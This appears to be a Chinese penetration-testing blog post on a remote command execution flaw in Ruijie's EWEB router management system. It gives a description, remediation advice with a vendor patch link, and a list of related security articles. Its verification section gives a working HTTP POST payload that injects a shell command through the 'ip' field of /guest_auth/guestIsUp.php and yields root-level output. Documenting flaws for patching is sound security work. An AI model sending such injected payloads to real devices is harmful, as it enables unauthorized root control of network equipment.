锐捷EWEB网管系统远程命令执行漏洞
2023-06-13 09:14:28 时间
前言
持续更新:整理下渗透测试工作中发现过的漏洞(包含漏洞描述、漏洞等级、漏洞验证、修复建议),这里不深究漏洞产生的各种后利用或者绕过方式,漏洞验证过程不局限于文章中的方法,能够证明漏洞存在即可。
0x01 漏洞描述
- 锐捷EWEB网管系统远程命令执行 -
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
0x02 漏洞等级
0x03 漏洞验证
访问锐捷EWEB网管系统界面,使用BurpSuite工具抓取数据包。
使用POST型数据包检测语句执行whoami命令,并将执行结果保存到test.txt中。
POST /guest_auth/guestIsUp.php
Content-Type: application/x-www-form-urlencoded
mac=1&ip=127.0.0.1|whoami > test.txt
访问/guest_auth/test.txt文件,获取当前服务器用户权限为ROOT
0x04 漏洞修复
- 对设备进行系统升级,限定内外网访问设备WEB页面(管理员除外)。
- 厂商已发布了漏洞修复程序,请及时关注更新:https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
相关文章
- 渗透测试|手把手教你搭建docker漏洞测试靶场
- android Activity漏洞挖掘
- HTTP.sys漏洞验证及防护[通俗易懂]
- 常见打印机缺陷账号与漏洞利用
- CVE-2022-0847:Linux DirtyPipe内核提权漏洞
- CVE-2013-2251 S2-016 远程代码执行漏洞
- 漏洞复现-CVE-2022-1388 F5 BIG-IP RCE
- 对于Discuz!3.2的基础认证钓鱼漏洞分析与修复
- 屠龙之术:Linux 系统的提权漏洞利用(linux提权漏洞)
- Win10已修复NTFS格式磁盘拒绝服务致系统崩溃的漏洞
- 苹果macOS系统再次出现任意密码解锁漏洞
- 谷歌挖出 iMessage 新漏洞,运行旧系统的 iPhone 只能重置修复
- PHP文件包含漏洞总结
- 异常中的异常——借助系统异常处理特例实现匪夷所思的漏洞利用
- 防止mssql差异备份漏洞来防范提权攻击(防mssql差异备份提权)
- oracle漏洞容易致使系统崩溃(oracle为啥容易崩溃)
- Oracle 10g系统存在的安全漏洞(oracle10g漏洞)
- 安全研究人员在苹果虐待儿童图片扫描系统中发现碰撞攻击漏洞